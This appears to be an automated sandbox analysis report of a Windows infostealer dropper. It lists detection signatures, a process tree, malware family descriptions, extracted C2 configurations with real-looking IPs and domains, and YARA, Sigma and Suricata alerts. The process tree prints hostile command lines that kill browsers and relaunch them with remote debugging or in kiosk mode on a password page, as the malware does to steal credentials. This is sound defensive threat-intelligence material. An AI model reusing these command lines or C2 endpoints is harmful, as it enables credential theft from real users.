Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1575889
MD5:	215688fc3175b17c270c29fe33195914
SHA1:	3880a4508834edf56d14cd784660880f0eb012a3
SHA256:	29851165599092069a369c86ecc491dfde744c82cb6118c241b41d517d7e11ff
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 215688FC3175B17C270C29FE33195914)

skotes.exe (PID: 6172 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 215688FC3175B17C270C29FE33195914)

skotes.exe (PID: 1960 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 215688FC3175B17C270C29FE33195914)

skotes.exe (PID: 5492 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 215688FC3175B17C270C29FE33195914)

d1834e5726.exe (PID: 5312 cmdline: "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

d1834e5726.exe (PID: 6172 cmdline: "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

d1834e5726.exe (PID: 2608 cmdline: "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

d1834e5726.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

4b8eda303b.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe" MD5: 9A1A8278DE829A8B0430E9EB10174992)

chrome.exe (PID: 3860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2532,i,6020324080176508680,18240390168964363109,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

2656cd82fe.exe (PID: 1732 cmdline: "C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe" MD5: 178C04A423C791C51C0D91ED1177DBCE)

95bf820dd4.exe (PID: 1084 cmdline: "C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe" MD5: DFD5F78A711FA92337010ECC028470B4)

chrome.exe (PID: 2076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2356,i,7633164809811582900,3596112793272210248,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7740 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

ccdb824191.exe (PID: 6256 cmdline: "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe" MD5: 385F0024661E626AD70879FA9EE43036)

8AU3DSUR7PD5E72PABBP65.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe" MD5: 17839CF1DD548DBB64EC23E644A475E0)

IUIANUOB2PLSS94RMQY0EED.exe (PID: 1408 cmdline: "C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe" MD5: 6B7CCA5A323F5E7087052DBE58F4C15A)

cd39094ad6.exe (PID: 5848 cmdline: "C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe" MD5: 6B7CCA5A323F5E7087052DBE58F4C15A)

5cbc6b58d3.exe (PID: 7604 cmdline: "C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe" MD5: 687BBF73E7B900FF5D46C6C2D23C6A40)

taskkill.exe (PID: 7672 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7900 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7964 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 8028 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 8092 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6652 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

7ea0decd34.exe (PID: 3340 cmdline: "C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe" MD5: 17839CF1DD548DBB64EC23E644A475E0)

ccdb824191.exe (PID: 2876 cmdline: "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe" MD5: 385F0024661E626AD70879FA9EE43036)

2604211P32LZMQXV6M.exe (PID: 8104 cmdline: MD5: 17839CF1DD548DBB64EC23E644A475E0)

ccdb824191.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe" MD5: 385F0024661E626AD70879FA9EE43036)

cd39094ad6.exe (PID: 8084 cmdline: "C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe" MD5: 6B7CCA5A323F5E7087052DBE58F4C15A)

firefox.exe (PID: 1052 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6548 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7004 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2096 -prefMapHandle 2088 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6311108f-34b2-4f01-81aa-d1551b4bf54b} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269cc26bf10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3280 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4136 -parentBuildID 20230927232528 -prefsHandle 4120 -prefMapHandle 3988 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e098c10-026b-4d67-9a0e-8d34b4933270} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269dd097210 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

5cbc6b58d3.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe" MD5: 687BBF73E7B900FF5D46C6C2D23C6A40)

taskkill.exe (PID: 8108 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7ea0decd34.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe" MD5: 17839CF1DD548DBB64EC23E644A475E0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["drive-connect.cyou", "formy-spill.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz", "print-vexer.biz", "impend-differ.biz", "covery-mover.biz"], "Build id": "FATE99--test"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: Cryptbot

{"C2 list": ["home.twentygr20sb.top"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2064441142.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.3221132708.000000000132E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3220821695.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000003.3352890856.0000000001252000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2085433951.0000000004870000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.3220361028.000000000132D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3220821695.000000000132D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.2485792183.00000000049C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000003.3299677003.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000003.3356052850.000000000126C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000015.00000002.3230900745.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000015.00000003.3138251493.0000000004E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000002.3393637637.0000000000E91000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000003.2093661123.00000000049D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000003.3288752753.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000003.3300305625.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3220361028.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000003.3392719887.000000000126D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.3232792590.0000000000E91000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000003.3221209371.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 95bf820dd4.exe PID: 1084	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: ccdb824191.exe PID: 6256	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ccdb824191.exe PID: 6256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ccdb824191.exe PID: 6256	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ccdb824191.exe PID: 2876	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ccdb824191.exe PID: 2876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ccdb824191.exe PID: 2876	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: cd39094ad6.exe PID: 5848	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: cd39094ad6.exe PID: 5848	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 5cbc6b58d3.exe PID: 7604	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: cd39094ad6.exe PID: 8084	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: cd39094ad6.exe PID: 8084	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.d70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.fb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.fb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccdb824191.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe, ParentProcessId: 1084, ParentProcessName: 95bf820dd4.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2076, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccdb824191.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:20.417104+0100	2028371	3	Unknown Traffic	192.168.2.5	49811	23.37.186.133	443	TCP
2024-12-16T11:03:53.642960+0100	2028371	3	Unknown Traffic	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:57.289012+0100	2028371	3	Unknown Traffic	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:04:00.456624+0100	2028371	3	Unknown Traffic	192.168.2.5	49924	104.21.50.161	443	TCP
2024-12-16T11:04:06.532187+0100	2028371	3	Unknown Traffic	192.168.2.5	49949	104.21.50.161	443	TCP
2024-12-16T11:04:07.751334+0100	2028371	3	Unknown Traffic	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:10.310751+0100	2028371	3	Unknown Traffic	192.168.2.5	49970	104.21.50.161	443	TCP
2024-12-16T11:04:11.879001+0100	2028371	3	Unknown Traffic	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:15.683047+0100	2028371	3	Unknown Traffic	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:16.233064+0100	2028371	3	Unknown Traffic	192.168.2.5	49996	104.21.50.161	443	TCP
2024-12-16T11:04:16.394074+0100	2028371	3	Unknown Traffic	192.168.2.5	49998	104.21.50.161	443	TCP
2024-12-16T11:04:18.108295+0100	2028371	3	Unknown Traffic	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:18.968897+0100	2028371	3	Unknown Traffic	192.168.2.5	50012	104.21.50.161	443	TCP
2024-12-16T11:04:20.176805+0100	2028371	3	Unknown Traffic	192.168.2.5	50015	104.21.50.161	443	TCP
2024-12-16T11:04:25.076209+0100	2028371	3	Unknown Traffic	192.168.2.5	50032	104.21.50.161	443	TCP
2024-12-16T11:04:26.907501+0100	2028371	3	Unknown Traffic	192.168.2.5	50041	104.21.50.161	443	TCP
2024-12-16T11:04:30.222163+0100	2028371	3	Unknown Traffic	192.168.2.5	50063	104.21.50.161	443	TCP
2024-12-16T11:04:30.640991+0100	2028371	3	Unknown Traffic	192.168.2.5	50066	104.21.50.161	443	TCP
2024-12-16T11:04:35.694293+0100	2028371	3	Unknown Traffic	192.168.2.5	50091	104.21.50.161	443	TCP
2024-12-16T11:04:36.012939+0100	2028371	3	Unknown Traffic	192.168.2.5	50092	104.21.50.161	443	TCP
2024-12-16T11:04:40.649447+0100	2028371	3	Unknown Traffic	192.168.2.5	50098	104.21.50.161	443	TCP
2024-12-16T11:04:41.070552+0100	2028371	3	Unknown Traffic	192.168.2.5	50099	104.21.50.161	443	TCP
2024-12-16T11:04:43.389374+0100	2028371	3	Unknown Traffic	192.168.2.5	50101	104.21.50.161	443	TCP
2024-12-16T11:04:45.922737+0100	2028371	3	Unknown Traffic	192.168.2.5	50105	104.21.50.161	443	TCP
2024-12-16T11:04:50.404359+0100	2028371	3	Unknown Traffic	192.168.2.5	50109	104.21.50.161	443	TCP
2024-12-16T11:11:25.842083+0100	2028371	3	Unknown Traffic	192.168.2.5	50382	104.102.49.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:56.058539+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:58.759759+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:04:10.168214+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:13.372905+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49979	104.21.50.161	443	TCP
